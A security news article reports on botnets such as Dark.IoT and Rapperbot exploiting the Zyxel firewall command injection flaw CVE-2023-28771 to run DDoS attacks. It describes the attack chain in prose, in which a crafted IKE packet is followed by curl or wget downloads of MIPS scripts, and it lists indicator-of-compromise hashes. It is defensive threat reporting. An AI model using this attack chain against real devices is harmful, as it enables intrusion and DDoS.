Thursday, February 22, 2024

Critical Zyxel Firewall Injection Flaw Exploited to Conduct DDoS Attacks

Increased botnet activity targeting vulnerability(CVE-2023-28771) in Zyxel devices has become a major concern to its users.

This vulnerability lets the unauthorized attacker execute the arbitrary code by sending a specifically crafted packet to the targeted device.

Since CISA added this vulnerability to the Known Exploited vulnerability, the surge of the attack has increased, and the severity of the flaw is rated as 9.8.

According to FortiGuard researchers, multiple botnets, including Dark.IoT-a variant based on Mirai and botnet that can perform customizable DDOS attacks was involved in targeting the vulnerability.

Botnet activity

Analysis of Attack:

The traffic has been observed across multiple regions, such as Central America, North America, and East and South Asia.

Threat actors specifically target the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices.

Later, They utilize curl or wget tools to download scripts to tailor MIPS architecture for further malicious actions.

The initial scripts downloaded rename themselves and execute zywall parameters to ensure the connectivity of ZyXEL vulnerability.

Additional scripts associated with Rapperbot malware were downloaded from a different server which further downloads MIPS script files to make persistence.

This shows threat actors utilized multiple servers for this campaign to compromise the ZyXEL devices.

Threat actors update their tactics and techniques frequently within a short time frame to maximize the compromised device.

As said earlier, one of the botnets employed by the threat actor is Darkā€”Iot which utilizes an openNIC server for DNS resolution and communication with the C2 server.

Devices with known vulnerabilities should be patched and updated as soon as possible to prevent attacks and compromises.

Once the victim system receives the attack command, it starts a DDoS attack on a specific IP address and port number. One example of this DDoS attack traffic is shown below.

IOCs

d618c817e6a93193a499126156a1f7e888008dacdb247a769fd69ce4c0c87b67
a6729c047d776294fa21956157eec0b50efa7447b8e2834b05be31080767006f
729f2fa4d037912a360cb7c4e2c37765da0c38725451600f0258109b672f615e
2c55674e938e7618f7c9273e3da61ce7aeab3dc5626b7b8b4e3fc7cc95d0436f
928d8ccd71edda5891068d703603ba0b70687f746c9da73afa6692b274ea757c
6137a30d8eb932d25664ced747424b15072e676b5d4d27d5b8f3b84f48344217
0c394849ce4f636cc79cc84389b66a0dbdaf14a61a6d87302e807f2153bc6c2b
2fe13ee992cf00778bcc92dc3732305114dca1700dedca7c29342216df236644
034cdcb42d1d7b921b4732230bbdcb4089107490a30b8cd7a62e67b657e33d26
3d69c780fefa0c3a34190989d43268a272004f0623d3e596bc0c92e1744832c9
79f69993110688372a5898d05f1141b7f44f3f5f55cd50b6a493c1d33af141c8
c68211116bbc43c2fe0aba8b598b88b218adc0d995311a4e7030de8acd48076e
51becb81d6bdfe79111974c05f2e4a20a8825a872a92df86cbc98517100b031a
42b4e116c5d2d3e9d4777c7eaa3c3835a126c02673583c2dfb1ae2bf0bf0db48
85d3d93910bfb8410a0e82810d05aa67a6702ce0cdfc38d1d01f2f9471d20150
12c65cfd227d393fd338223eb50140571760de04ef0a21fe3c4636e1bfaf4966
f82f5ec551f9ac3bb5a3b1ace5dd21c35239bd983fd9a36e0e7c07bfb48a3fdd
28fa9225db6d42084123989712313489e255376134f8e77f07b77c345a026304
312022da42ab6df882c44d984f9aceea7f08e217a5ca8ca985c533a1af399cee
Website

Latest articles

Earth Preta Hackers Abuses Google Drive to Deploy DOPLUGS Malware

Threat actors abuse Google Drive for several malicious activities due to its widespread use,...

Swiggy Account Hacked, Hackers Placed Orders Worth Rs 97,000

In a startling incident underscoring the growing menace of cybercrime, a woman's Swiggy account...

Beware of VietCredCare Malware that Steals businesses’ Facebook Accounts

A new cybersecurity threat targeting Facebook advertisers in Vietnam, known as VietCredCare, has emerged....

Google Chrome 122 Update Addresses Critical Security Vulnerabilities

Google has recently unveiled Chrome 122, a significant milestone for the widely used web...

New Malicious PyPI Packages Use DLL Sideloading In A Supply Chain Attack

Researchers have discovered that threat actors have been using open-source platforms and codes for...

New Mingo Malware Attacking Linux Redis Servers To Mine Cryptocurrency

The malware, termed Migo by the creators, attempts to infiltrate Redis servers to mine cryptocurrency on...

Security Onion 2.4.50 Released for Defenders With New Features

Security Onion Solutions has recently rolled out the latest version of its network security...

Live Account Takeover Attack Simulation

Live Account Take Over Attack

Live Webinar on How do hackers bypass 2FA ,Detecting ATO attacks, A demo of credential stuffing, brute force and session jacking-based ATO attacks, Identifying attacks with behaviour-based analysis and Building custom protection for applications and APIs.

Related Articles